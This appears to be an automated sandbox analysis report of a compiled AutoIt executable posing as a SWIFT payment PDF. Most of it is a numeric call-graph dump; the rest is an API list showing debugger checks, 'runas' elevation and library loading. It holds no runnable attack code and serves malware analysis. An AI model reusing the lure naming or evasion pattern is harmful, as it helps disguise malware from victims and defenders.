87703 413748 46 API calls 87705 432122 87703->87705 87704 432135 87704->87673 87704->87674 87705->87704 87707 413748 46 API calls 87705->87707 87706->87703 87706->87705 87707->87704 87709 442d60 87708->87709 87711 442dbd 87708->87711 87709->87699 87711->87709 87717 4320a4 87711->87717 87713 432092 87712->87713 87714 43207f 87712->87714 87713->87667 87715 4142b6 79 API calls 87714->87715 87715->87713 87716->87699 87718 4320e6 87717->87718 87719 4320cf 87717->87719 87718->87711 87721 4142b6 87719->87721 87722 4142c2 87721->87722 87723 4142f2 87722->87723 87724 4142da 87722->87724 87726 4142ea 87722->87726 87727 415471 47 API calls 87723->87727 87725 417f77 46 API calls 87724->87725 87728 4142df 87725->87728 87726->87718 87729 4142fa 87727->87729 87731 417f25 10 API calls 87728->87731 87730 41415f 77 API calls 87729->87730 87732 41430f 87730->87732 87731->87726 87733 414326 LeaveCriticalSection LeaveCriticalSection 87732->87733 87733->87726 87734->86971 87735->86971 87736->86971 87737->86970 87738->86971 87739->86971 87740->86979 87741->86987 87742->86989 87743->86989 87744->86993 87745->87002 87746->86996 87796 410160 87747->87796 87749 41012f GetFullPathNameW 87750 410147 87749->87750 87750->86815 87752 4102cb SHGetDesktopFolder 87751->87752 87755 410333 87751->87755 87753 4102e0 87752->87753 87752->87755 87754 41031c SHGetPathFromIDListW 87753->87754 87753->87755 87754->87755 87755->86819 87757 4101bb 87756->87757 87763 425f4a 87756->87763 87758 410160 52 API calls 87757->87758 87760 4101c7 87758->87760 87759 4114ab 58 API calls 87759->87763 87800 410200 52 API calls 87760->87800 87762 425f6e 87762->86821 87763->87759 87763->87762 87764 4101d6 87801 410200 52 API calls 87764->87801 87766 4101e9 87766->86821 87768 40f760 128 API calls 87767->87768 87769 40f584 87768->87769 87770 429335 87769->87770 87771 40f58c 87769->87771 87774 4528bd 118 API calls 87770->87774 87772 40f598 87771->87772 87773 429358 87771->87773 87802 4033c0 113 API calls 87772->87802 87803 434034 86 API calls 87773->87803 87776 42934b 87774->87776 87779 429373 87776->87779 87780 42934f 87776->87780 87778 40f5b4 87778->86818 87782 4115d7 52 API calls 87779->87782 87783 431e58 82 API calls 87780->87783 87781 429369 87781->87779 87795 4293c5 87782->87795 87783->87773 87784 42959c 87785 413748 46 API calls 87784->87785 87786 4295a5 87785->87786 87787 431e58 82 API calls 87786->87787 87788 4295b1 87787->87788 87792 401b10 52 API calls 87792->87795 87795->87784 87795->87792 87804 444af8 52 API calls 87795->87804 87805 44c7dd 64 API calls 87795->87805 87806 44b41c 52 API calls 87795->87806 87807 402780 52 API calls 87795->87807 87808 4022d0 52 API calls 87795->87808 87797 410167 87796->87797 87798 4115d7 52 API calls 87797->87798 87799 41017e 87798->87799 87799->87749 87800->87764 87801->87766 87802->87778 87803->87781 87804->87795 87805->87795 87806->87795 87807->87795 87808->87795 87810 402417 87809->87810 87814 402539 87809->87814 87811 4115d7 52 API calls 87810->87811 87810->87814 87812 402443 87811->87812 87813 4115d7 52 API calls 87812->87813 87816 4024b4 87813->87816 87814->86825 87816->87814 87838 402880 87816->87838 87880 4022d0 52 API calls 87816->87880 87823 401566 87818->87823 87819 401794 87895 40e9a0 90 API calls 87819->87895 87822 4010a0 52 API calls 87822->87823 87823->87819 87823->87822 87824 40167a 87823->87824 87825 4017c0 87824->87825 87896 45e737 90 API calls 87824->87896 87825->86827 87827 40bc70 52 API calls 87826->87827 87836 40d451 87827->87836 87828 40d50f 87899 410600 52 API calls 87828->87899 87830 427c01 87900 45e737 90 API calls 87830->87900 87831 40e0a0 52 API calls 87831->87836 87833 401b10 52 API calls 87833->87836 87834 40d519 87834->86830 87836->87828 87836->87830 87836->87831 87836->87833 87836->87834 87897 40f310 53 API calls 87836->87897 87898 40d860 91 API calls 87836->87898 87839 4115d7 52 API calls 87838->87839 87840 4028b3 87839->87840 87841 4115d7 52 API calls 87840->87841 87862 4028c5 87841->87862 87843 402b1e 87843->87816 87844 427d62 87847 403350 52 API calls 87844->87847 87846 402bb6 87883 403060 53 API calls 87846->87883 87857 427d6b 87847->87857 87849 402aeb 87851 42802b 87849->87851 87882 402780 52 API calls 87849->87882 87850 402bca 87852 427f63 87850->87852 87853 402bd4 87850->87853 87890 460879 92 API calls 87852->87890 87884 402780 52 API calls 87853->87884 87854 403350 52 API calls 87854->87862 87879 427f2c 87857->87879 87887 403020 52 API calls 87857->87887 87858 427f48 87858->87843 87860 402bdf 87860->87816 87862->87844 87862->87846 87862->87849 87862->87854 87863 427fd5 87862->87863 87867 427fa5 87862->87867 87868 402f00 52 API calls 87862->87868 87870 428000 87862->87870 87872 4026f0 52 API calls 87862->87872 87877 4115d7 52 API calls 87862->87877 87878 402780 52 API calls 87862->87878 87862->87879 87881 4031b0 63 API calls 87862->87881 87885 402f80 92 API calls 87862->87885 87886 402280 52 API calls 87862->87886 87888 4013a0 52 API calls 87862->87888 87892 460879 92 API calls 87863->87892 87866 427fe4 87893 402780 52 API calls 87866->87893 87891 402780 52 API calls 87867->87891 87868->87862 87894 460879 92 API calls 87870->87894 87873 402a85 CharUpperBuffW 87872->87873 87873->87862 87877->87862 87878->87862 87889 460879 92 API calls 87879->87889 87880->87816 87881->87862 87882->87843 87883->87850 87884->87860 87885->87862 87886->87862 87887->87857 87888->87862 87889->87858 87890->87858 87891->87843 87892->87866 87893->87858 87894->87843 87895->87824 87896->87825 87897->87836 87898->87836 87899->87834 87900->87834 87901->86843 87902->86844 87904 4091c6 87903->87904 87905 42c5fe 87903->87905 87904->86903 87905->87904 87906 40bc70 52 API calls 87905->87906 87907 42c64e InterlockedIncrement 87906->87907 87908 42c665 87907->87908 87913 42c697 87907->87913 87911 42c672 InterlockedDecrement Sleep InterlockedIncrement 87908->87911 87908->87913 87909 42c737 InterlockedDecrement 87910 42c74a 87909->87910 87914 408f40 VariantClear 87910->87914 87911->87908 87911->87913 87912 42c731 87912->87909 87913->87909 87913->87912 88187 408e80 VariantClear 87913->88187 87916 42c752 87914->87916 88197 410c60 VariantClear 87916->88197 87917 42c6cf 88188 45340c 87917->88188 87920 42c6db 87921 402160 52 API calls 87920->87921 87922 42c6e5 87921->87922 87923 45340c 85 API calls 87922->87923 87924 42c6f1 87923->87924 88194 40d200 52 API calls 87924->88194 87926 42c6fb 88195 465124 53 API calls 87926->88195 87928 42c715 87929 42c76a 87928->87929 87930 42c719 87928->87930 87932 401b10 52 API calls 87929->87932 88196 46fe32 VariantClear 87930->88196 87933 42c77e 87932->87933 87934 401980 53 API calls 87933->87934 87940 42c796 87934->87940 87935 42c812 88204 46fe32 VariantClear 87935->88204 87937 42c82a InterlockedDecrement 88205 46ff07 54 API calls 87937->88205 87939 42c864 88206 45e737 90 API calls 87939->88206 87940->87935 87940->87939 88198 40ba10 87940->88198 87942 42c9ec 87947 401980 53 API calls 87957 42c849 87947->87957 87948 408f40 VariantClear 87948->87957 87950 42c874 87952 408f40 VariantClear 87950->87952 87960 42ca59 87950->87960 87953 42c891 87952->87953 88207 410c60 VariantClear 87953->88207 87957->87942 87957->87947 87957->87948 87958 402780 52 API calls 87957->87958 88208 40a780 87957->88208 87958->87957 87960->87960 87962 40afc4 87961->87962 87963 40b156 87961->87963 87964 40afd5 87962->87964 87965 42d1e3 87962->87965 88261 45e737 90 API calls 87963->88261 87968 40a780 261 API calls 87964->87968 87986 40b11a 87964->87986 88262 45e737 90 API calls 87965->88262 87971 40b00a 87968->87971 87969 42d1f8 87973 408f40 VariantClear 87969->87973 87971->87969 87978 40b012 87971->87978 87972 42d4db 87972->87972 87974 40b143 87973->87974 87974->86903 87975 40b04a 87984 40b05c 87975->87984 88263 40e270 VariantClear 87975->88263 87976 40b094 87977 40b108 87976->87977 87982 42d425 87976->87982 87977->87986 88264 40e270 VariantClear 87977->88264 87978->87975 87978->87976 87979 42d231 VariantClear 87978->87979 87979->87984 87980 42d45a VariantClear 87980->87986 87982->87980 87982->87986 87984->87976 87985 4115d7 52 API calls 87984->87985 87985->87976 87986->87974 88265 45e737 90 API calls 87986->88265 87988 408fff 87987->87988 87991 40900d 87987->87991 88266 403ea0 52 API calls 87988->88266 87992 42c3f6 87991->87992 87994 40a780 261 API calls 87991->87994 87995 42c44a 87991->87995 87997 42c47b 87991->87997 87999 42c4cb 87991->87999 88000 42c564 87991->88000 88003 42c548 87991->88003 88007 409112 87991->88007 88009 4090df 87991->88009 88011 42c528 87991->88011 88014 4090ea 87991->88014 88021 4090f2 87991->88021 88269 4534e3 52 API calls 87991->88269 88271 40c4e0 261 API calls 87991->88271 88270 45e737 90 API calls 87992->88270 87994->87991 88272 45e737 90 API calls 87995->88272 88273 451b42 61 API calls 87997->88273 88275 47faae 300 API calls 87999->88275 88004 408f40 VariantClear 88000->88004 88278 45e737 90 API calls 88003->88278 88004->88021 88005 42c491 88005->88021 88274 45e737 90 API calls 88005->88274 88006 42c4da 88006->88021 88276 45e737 90 API calls 88006->88276 88007->88003 88012 40912b 88007->88012 88009->88014 88267 408e80 VariantClear 88009->88267 88277 45e737 90 API calls 88011->88277 88012->88021 88268 403e10 53 API calls 88012->88268 88017 408f40 VariantClear 88014->88017 88017->88021 88019 40914b 88020 408f40 VariantClear 88019->88020 88020->88021 88021->86903 88279 408d90 88022->88279 88024 408cf9 88025 429778 88024->88025 88028 42976c 88024->88028 88030 408d2d 88024->88030 88308 410c60 VariantClear 88025->88308 88027 429780 88307 45e737 90 API calls 88028->88307 88295 403d10 88030->88295 88033 408d71 88033->86903 88034 408f40 VariantClear 88035 408d45 88034->88035 88035->88033 88035->88034 88037 4096c6 88036->88037 88038 40a70c 88037->88038 88039 4115d7 52 API calls 88037->88039 88839 4013a0 52 API calls 88038->88839 88040 4096fa 88039->88040 88041 4115d7 52 API calls 88040->88041 88044 40971b 88041->88044 88043 4297aa 88045 4115d7 52 API calls 88043->88045 88044->88038 88046 409749 CharUpperBuffW 88044->88046 88049 40976a 88044->88049 88048 4297d1 88045->88048 88046->88049 88867 45e737 90 API calls 88048->88867 88056 4097e5 88049->88056 88840 47dcbb 263 API calls 88049->88840 88051 408f40 VariantClear 88052 42ae92 88051->88052 88868 410c60 VariantClear 88052->88868 88054 42aea4 88055 409aa2 88055->88048 88058 4115d7 52 API calls 88055->88058 88063 409afe 88055->88063 88056->88048 88056->88055 88057 40a689 88056->88057 88059 4115d7 52 API calls 88056->88059 88061 40a6af 88056->88061 88062 40c2c0 52 API calls 88056->88062 88069 429a46 VariantClear 88056->88069 88070 408f40 VariantClear 88056->88070 88081 40ba10 52 API calls 88056->88081 88088 4299d9 88056->88088 88092 429abd 88056->88092 88100 40a780 261 API calls 88056->88100 88104 42a452 88056->88104 88841 40c4e0 261 API calls 88056->88841 88843 40e270 VariantClear 88056->88843 88060 4115d7 52 API calls 88057->88060 88058->88063 88059->88056 88060->88061 88084 4115d7 52 API calls 88061->88084 88062->88056 88064 4115d7 52 API calls 88063->88064 88065 409b2a 88063->88065 88067 429d31 88064->88067 88066 429dbe 88065->88066 88122 409b4d 88065->88122 88847 40b400 VariantClear VariantClear 88065->88847 88072 429dd3 88066->88072 88848 40b400 VariantClear VariantClear 88066->88848 88075 429d42 88067->88075 88844 44a801 52 API calls 88067->88844 88069->88056 88070->88056 88072->88122 88849 40e1c0 VariantClear 88072->88849 88074 40a045 88078 4115d7 52 API calls 88074->88078 88080 40e0a0 52 API calls 88075->88080 88085 40a04c 88078->88085 88086 429d57 88080->88086 88081->88056 88082 42a42f 88854 45e737 90 API calls 88082->88854 88084->88038 88087 40a0a7 88085->88087 88090 4091e0 386 API calls 88085->88090 88845 453443 52 API calls 88086->88845 88105 40a0af 88087->88105 88855 40c790 VariantClear 88087->88855 88091 408f40 VariantClear 88088->88091 88090->88087 88096 4299e2 88091->88096 88092->86903 88093 429d88 88846 453443 52 API calls 88093->88846 88842 410c60 VariantClear 88096->88842 88100->88056 88101 402780 52 API calls 88101->88122 88103 408f40 VariantClear 88137 40a162 88103->88137 88104->88051 88106 40a11b 88105->88106 88108 42a4b4 VariantClear 88105->88108 88105->88137 88113 40a12d 88106->88113 88856 40e270 VariantClear 88106->88856 88107 40a780 261 API calls 88107->88122 88108->88113 88110 401980 53 API calls 88110->88122 88112 4115d7 52 API calls 88112->88137 88113->88112 88113->88137 88116 44a801 52 API calls 88116->88122 88117 41130a 51 API calls 88117->88122 88118 42a74d VariantClear 88118->88137 88119 4115d7 52 API calls 88119->88122 88120 40a368 88123 42aad4 88120->88123 88131 40a397 88120->88131 88121 40e270 VariantClear 88121->88137 88122->88038 88122->88082 88122->88101 88122->88107 88122->88110 88122->88116 88122->88117 88122->88119 88124 409fd2 88122->88124 88125 42a3f5 88122->88125 88130 409c95 88122->88130 88850 45f508 52 API calls 88122->88850 88851 403e10 53 API calls 88122->88851 88852 408e80 VariantClear 88122->88852 88860 46fe90 VariantClear VariantClear 88123->88860 88124->88074 88124->88125 88853 47390f VariantClear 88125->88853 88126 42a7e4 VariantClear 88126->88137 88127 42a886 VariantClear 88127->88137 88129 40a3ce 88145 40a3d9 88129->88145 88861 40b400 VariantClear VariantClear 88129->88861 88130->86903 88131->88129 88156 40a42c 88131->88156 88838 40b400 VariantClear VariantClear 88131->88838 88134 4115d7 52 API calls 88134->88137 88135 42abaf 88140 42abd4 VariantClear 88135->88140 88149 40a4ee 88135->88149 88136 4115d7 52 API calls 88139 42a5a6 VariantInit VariantCopy 88136->88139 88137->88103 88137->88118 88137->88120 88137->88121 88137->88123 88137->88126 88137->88127 88137->88134 88137->88136 88857 470870 52 API calls 88137->88857 88858 408e80 VariantClear 88137->88858 88859 44ccf1 VariantClear 88137->88859 88138 40a4dc 88138->88149 88863 40e270 VariantClear 88138->88863 88139->88137 88142 42a5c6 VariantClear 88139->88142 88140->88149 88141 40a41a 88141->88156 88862 40e270 VariantClear 88141->88862 88142->88137 88143 42ac4f 88150 42ac79 VariantClear 88143->88150 88154 40a546 88143->88154 88145->88141 88147 42ab44 VariantClear 88145->88147 88145->88156 88146 40a534 88146->88154 88864 40e270 VariantClear 88146->88864 88147->88156 88149->88143 88149->88146 88150->88154 88151 42ad28 88157 42ad4e VariantClear 88151->88157 88162 40a583 88151->88162 88154->88151 88155 40a571 88154->88155 88155->88162 88865 40e270 VariantClear 88155->88865 88156->88135 88156->88138 88157->88162 88159 40a650 88159->86903 88160 42ae0e VariantClear 88160->88162 88162->88159 88162->88160 88866 40e270 VariantClear 88162->88866 88163->86903 88164->86903 88165->86903 88166->86854 88167->86859 88168->86903 88169->86903 88170->86903 88171->86903 88172->86911 88173->86911 88174->86911 88175->86911 88176->86911 88177->86911 88178->86911 88180 403cdf 88179->88180 88181 408f40 VariantClear 88180->88181 88182 403ce7 88181->88182 88182->86898 88183->86911 88184->86911 88185->86903 88186->86851 88187->87917 88189 453439 88188->88189 88191 453419 88188->88191 88189->87920 88190 45342f 88190->87920 88191->88190 88251 4531b1 85 API calls 88191->88251 88193 453425 88193->87920 88194->87926 88195->87928 88196->87912 88197->87904 88199 40ba49 88198->88199 88200 40ba1b 88198->88200 88202 4115d7 52 API calls 88199->88202 88201 4115d7 52 API calls 88200->88201 88203 40ba22 88201->88203 88202->88200 88203->87940 88204->87937 88205->87957 88206->87950 88207->87904 88251->88193 88261->87965 88262->87969 88263->87984 88264->87986 88265->87972 88266->87991 88267->88014 88268->88019 88269->87991 88270->88021 88271->87991 88272->88021 88273->88005 88274->88021 88275->88006 88276->88021 88277->88021 88278->88000 88280 4289d2 88279->88280 88281 408db3 88279->88281 88314 45e737 90 API calls 88280->88314 88309 40bec0 88281->88309 88284 408dc9 88285 4289e5 88284->88285 88287 428a05 88284->88287 88288 40ba10 52 API calls 88284->88288 88290 40a780 261 API calls 88284->88290 88291 408e64 88284->88291 88293 408f40 VariantClear 88284->88293 88294 408e5a 88284->88294 88315 45e737 90 API calls 88285->88315 88289 408f40 VariantClear 88287->88289 88288->88284 88289->88294 88290->88284 88292 408f40 VariantClear 88291->88292 88292->88294 88293->88284 88294->88024 88296 408f40 VariantClear 88295->88296 88297 403d20 88296->88297 88298 403cd0 VariantClear 88297->88298 88299 403d4d 88298->88299 88317 475596 88299->88317 88320 46e1a6 88299->88320 88368 46f993 88299->88368 88407 4813fa 88299->88407 88417 4755ad 88299->88417 88420 467897 88299->88420 88300 403d76 88300->88025 88300->88035 88307->88025 88308->88027 88310 40bed0 88309->88310 88311 40bef2 88310->88311 88312 427ae9 88310->88312 88316 45e737 90 API calls 88310->88316 88311->88284 88312->88284 88314->88285 88315->88287 88316->88312 88464 475077 88317->88464 88319 4755a9 88319->88300 88321 46e1c0 88320->88321 88322 4533eb 85 API calls 88321->88322 88324 46e1dc 88322->88324 88323 46e483 88323->88300 88324->88323 88325 46e2e7 88324->88325 88326 46e1e9 88324->88326 88328 40f760 128 API calls 88325->88328 88327 45340c 85 API calls 88326->88327 88335 46e1f4 88327->88335 88329 46e2f7 88328->88329 88330 46e2fc 88329->88330 88331 46e30d 88329->88331 88333 403cd0 VariantClear 88330->88333 88332 45340c 85 API calls 88331->88332 88334 46e332 88332->88334 88336 46e2c8 88333->88336 88337 413a0e 46 API calls 88334->88337 88340 46e248 88335->88340 88344 46e216 88335->88344 88339 408f40 VariantClear 88336->88339 88338 46e338 88337->88338 88350 45340c 85 API calls 88338->88350 88341 46e2d0 88339->88341 88342 45340c 85 API calls 88340->88342 88341->88300 88343 46e264 88342->88343 88675 433998 GetFileAttributesW 88343->88675 88345 45340c 85 API calls 88344->88345 88345->88340 88347 46e27d 88347->88336 88348 45340c 85 API calls 88347->88348 88349 46e2b0 88348->88349 88352 46e3e3 88350->88352 88369 40e710 53 API calls 88368->88369 88370 46f9ba 88369->88370 88371 4115d7 52 API calls 88370->88371 88377 46fa26 88370->88377 88373 46f9d3 88371->88373 88372 46f9df 88376 4533eb 85 API calls 88372->88376 88373->88372 88700 40da60 53 API calls 88373->88700 88374 46fa38 88374->88300 88379 46f9f0 88376->88379 88377->88374 88384 46fa7a 88377->88384 88686 44c285 88377->88686 88701 40de40 88379->88701 88381 46fb17 88386 40bc70 52 API calls 88381->88386 88382 46fa99 88385 4115d7 52 API calls 88382->88385 88384->88381 88384->88382 88388 46fa9f 88385->88388 88389 46fb20 88386->88389 88391 46fab6 88388->88391 88714 443ee5 ReadFile SetFilePointerEx 88388->88714 88689 46ea94 88389->88689 88402 46faba 88391->88402 88715 453132 53 API calls 88391->88715 88395 46fb30 88395->88402 88716 40e6a0 53 API calls 88395->88716 88397 46faea 88401 403cd0 VariantClear 88397->88401 88401->88402 88403 46fb99 88402->88403 88717 40da20 88402->88717 88403->88300 88405 46fb8b 88721 44ae3e CloseHandle 88405->88721 88408 45340c 85 API calls 88407->88408 88409 481438 88408->88409 88410 402880 95 API calls 88409->88410 88412 48143f 88410->88412 88411 481465 88414 40e710 53 API calls 88411->88414 88415 481469 88411->88415 88412->88411 88413 40a780 261 API calls 88412->88413 88413->88411 88416 4814a4 88414->88416 88415->88300 88416->88300 88418 475077 128 API calls 88417->88418 88419 4755c0 88418->88419 88419->88300 88421 4678bb 88420->88421 88424 45340c 85 API calls 88421->88424 88453 467954 88421->88453 88422 4115d7 52 API calls 88423 467989 88422->88423 88425 467995 88423->88425 88835 40da60 53 API calls 88423->88835 88426 4678f6 88424->88426 88429 4533eb 85 API calls 88425->88429 88428 413a0e 46 API calls 88426->88428 88430 4678fc 88428->88430 88431 4679b7 88429->88431 88432 401b10 52 API calls 88430->88432 88433 40de40 60 API calls 88431->88433 88434 46790c 88432->88434 88435 4679c3 88433->88435 88833 40d200 52 API calls 88434->88833 88437 4679c7 GetLastError 88435->88437 88438 467a05 88435->88438 88440 403cd0 VariantClear 88437->88440 88442 467a2c 88438->88442 88443 467a4b 88438->88443 88439 467917 88441 4339fa 3 API calls 88439->88441 88439->88453 88444 4679dc 88440->88444 88447 467928 88441->88447 88448 4115d7 52 API calls 88442->88448 88445 4115d7 52 API calls 88443->88445 88446 4679e6 88444->88446 88836 44ae3e CloseHandle 88444->88836 88449 467a49 88445->88449 88451 46792f 88447->88451 88447->88453 88455 467a31 88448->88455 88459 408f40 VariantClear 88449->88459 88834 4335cd 56 API calls 88451->88834 88453->88422 88454 467964 88453->88454 88454->88300 88517 4533eb 88464->88517 88467 4750ee 88470 408f40 VariantClear 88467->88470 88468 475129 88521 4646e0 88468->88521 88475 4750f5 88470->88475 88471 47515e 88472 475162 88471->88472 88510 47518e 88471->88510 88475->88319 88510->88510 88518 453404 88517->88518 88519 4533f8 88517->88519 88518->88467 88518->88468 88519->88518 88593 4531b1 85 API calls 88519->88593 88594 4536f7 53 API calls 88521->88594 88523 4646fc 88595 4426cd 59 API calls 88523->88595 88525 464711 88527 40bc70 52 API calls 88525->88527 88533 46474b 88525->88533 88528 46472c 88527->88528 88596 461465 52 API calls 88528->88596 88530 464741 88532 464793 88532->88471 88533->88532 88597 463ad5 64 API calls 88533->88597 88593->88518 88594->88523 88595->88525 88596->88530 88597->88532 88675->88347 88722 443d73 88686->88722 88690 46eac5 88689->88690 88691 46eaac 88689->88691 88752 45f72f 54 API calls 88690->88752 88692 46eab1 88691->88692 88693 46eabb 88691->88693 88736 4689aa 88692->88736 88744 46ea4a 88693->88744 88697 46eaca 88697->88395 88700->88372 88702 40da20 CloseHandle 88701->88702 88703 40de4e 88702->88703 88793 40f110 88703->88793 88714->88391 88715->88397 88718 40da37 88717->88718 88719 40da29 88717->88719 88718->88719 88720 40da3c CloseHandle 88718->88720 88719->88405 88720->88405 88721->88403 88727 40df90 88722->88727 88725 40df90 2 API calls 88726 443da5 88725->88726 88726->88384 88733 40dfa2 88727->88733 88728 425e30 88735 40e050 SetFilePointerEx 88728->88735 88729 40e01b SetFilePointerEx 88734 40e050 SetFilePointerEx 88729->88734 88732 40dff3 88732->88725 88733->88728 88733->88729 88733->88732 88734->88732 88735->88732 88753 40d370 88736->88753 88745 40d370 52 API calls 88744->88745 88746 46ea59 88745->88746 88752->88697 88754 4115d7 52 API calls 88753->88754 88794 40f125 CreateFileW 88793->88794 88795 42630c 88793->88795 88797 40de74 88794->88797 88796 426311 CreateFileW 88795->88796 88795->88797 88796->88797 88833->88439 88835->88425 88836->88446 88838->88129 88839->88043 88840->88049 88841->88056 88842->88159 88843->88056 88844->88075 88845->88093 88846->88065 88847->88066 88848->88072 88849->88122 88850->88122 88851->88122 88852->88122 88853->88082 88854->88104 88855->88087 88856->88113 88857->88137 88858->88137 88859->88137 88860->88129 88861->88145 88862->88156 88863->88149 88864->88154 88865->88162 88866->88162 88867->88104 88868->88054 88869 42d154 88870 480a8d 261 API calls 88869->88870 88871 42d161 88870->88871 88872 480a8d 261 API calls 88871->88872 88872->88871 88873 42b14b 88880 40bc10 88873->88880 88875 42b159 88876 4096a0 400 API calls 88875->88876 88877 42b177 88876->88877 88891 44b92d VariantClear 88877->88891 88879 42bc5b 88881 40bc24 88880->88881 88882 40bc17 88880->88882 88883 40bc2a 88881->88883 88884 40bc3c 88881->88884 88892 408e80 VariantClear 88882->88892 88893 408e80 VariantClear 88883->88893 88888 4115d7 52 API calls 88884->88888 88886 40bc1f 88886->88875 88890 40bc43 88888->88890 88889 40bc33 88889->88875 88890->88875 88891->88879 88892->88886 88893->88889 88894 425b2b 88899 40f000 88894->88899 88898 425b3a 88900 4115d7 52 API calls 88899->88900 88901 40f007 88900->88901 88902 4276ea 88901->88902 88908 40f030 88901->88908 88907 41130a 51 API calls 88907->88898 88909 40f039 88908->88909 88910 40f01a 88908->88910 88938 41130a 51 API calls 88909->88938 88912 40e500 88910->88912 88913 40bc70 52 API calls 88912->88913 88914 40e515 GetVersionExW 88913->88914 88915 402160 52 API calls 88914->88915 88916 40e557 88915->88916 88939 40e660 88916->88939 88922 427674 88926 4276c6 GetSystemInfo 88922->88926 88924 40e5e0 88928 4276d5 GetSystemInfo 88924->88928 88953 40efd0 88924->88953 88925 40e5cd GetCurrentProcess 88960 40ef20 LoadLibraryA GetProcAddress 88925->88960 88926->88928 88931 40e629 88957 40ef90 88931->88957 88934 40e641 FreeLibrary 88935 40e644 88934->88935 88936 40e653 FreeLibrary 88935->88936 88937 40e656 88935->88937 88936->88937 88937->88907 88938->88910 88940 40e667 88939->88940 88941 42761d 88940->88941 88942 40c600 52 API calls 88940->88942 88943 40e55c 88942->88943 88944 40e680 88943->88944 88945 40e687 88944->88945 88946 427616 88945->88946 88947 40c600 52 API calls 88945->88947 88948 40e566 88947->88948 88948->88922 88949 40ef60 88948->88949 88950 40e5c8 88949->88950 88951 40ef66 LoadLibraryA 88949->88951 88950->88924 88950->88925 88951->88950 88952 40ef77 GetProcAddress 88951->88952 88952->88950 88954 40e620 88953->88954 88955 40efd6 LoadLibraryA 88953->88955 88954->88926 88954->88931 88955->88954 88956 40efe7 GetProcAddress 88955->88956 88956->88954 88961 40efb0 LoadLibraryA GetProcAddress 88957->88961 88959 40e632 GetNativeSystemInfo 88959->88934 88959->88935 88960->88924 88961->88959 88962 41223f8 88976 4120048 88962->88976 88964 41224c4 88979 41222e8 88964->88979 88982 41234e8 GetPEB 88976->88982 88978 41206d3 88978->88964 88980 41222f1 Sleep 88979->88980 88981 41222ff 88980->88981 88983 4123512 88982->88983 88983->88978 88984 425b5e 88989 40c7f0 88984->88989 88988 425b6d 89024 40db10 52 API calls 88989->89024 88991 40c82a 89025 410ab0 6 API calls 88991->89025 88993 40c86d 88994 40bc70 52 API calls 88993->88994 88995 40c877 88994->88995 88996 40bc70 52 API calls 88995->88996 88997 40c881 88996->88997 88998 40bc70 52 API calls 88997->88998 88999 40c88b 88998->88999 89000 40bc70 52 API calls 88999->89000 89001 40c8d1 89000->89001 89002 40bc70 52 API calls 89001->89002 89003 40c991 89002->89003 89026 40d2c0 52 API calls 89003->89026 89005 40c99b 89027 40d0d0 53 API calls 89005->89027 89007 40c9c1 89008 40bc70 52 API calls 89007->89008 89009 40c9cb 89008->89009 89028 40e310 53 API calls 89009->89028 89011 40ca28 89012 408f40 VariantClear 89011->89012 89013 40ca30 89012->89013 89014 408f40 VariantClear 89013->89014 89015 40ca38 GetStdHandle 89014->89015 89016 429630 89015->89016 89017 40ca87 89015->89017 89016->89017 89018 429639 89016->89018 89023 41130a 51 API calls 89017->89023 89029 4432c0 57 API calls 89018->89029 89020 429641 89030 44b6ab CreateThread 89020->89030 89022 42964f CloseHandle 89022->89017 89023->88988 89024->88991 89025->88993 89026->89005 89027->89007 89028->89011 89029->89020 89030->89022 89031 44b5cb 58 API calls 89030->89031 89032 425b6f 89037 40dc90 89032->89037 89036 425b7e 89038 40bc70 52 API calls 89037->89038 89039 40dd03 89038->89039 89046 40f210 89039->89046 89041 426a97 89043 40dd96 89043->89041 89044 40ddb7 89043->89044 89049 40dc00 52 API calls 89043->89049 89045 41130a 51 API calls 89044->89045 89045->89036 89050 40f250 RegOpenKeyExW 89046->89050 89048 40f230 89048->89043 89049->89043 89051 425e17 89050->89051 89052 40f275 RegQueryValueExW 89050->89052 89051->89048 89053 40f2c3 RegCloseKey 89052->89053 89054 40f298 89052->89054 89053->89048 89055 40f2a9 RegCloseKey 89054->89055 89056 425e1d 89054->89056 89055->89048

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,00000104,?), ref: 00401F4C
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
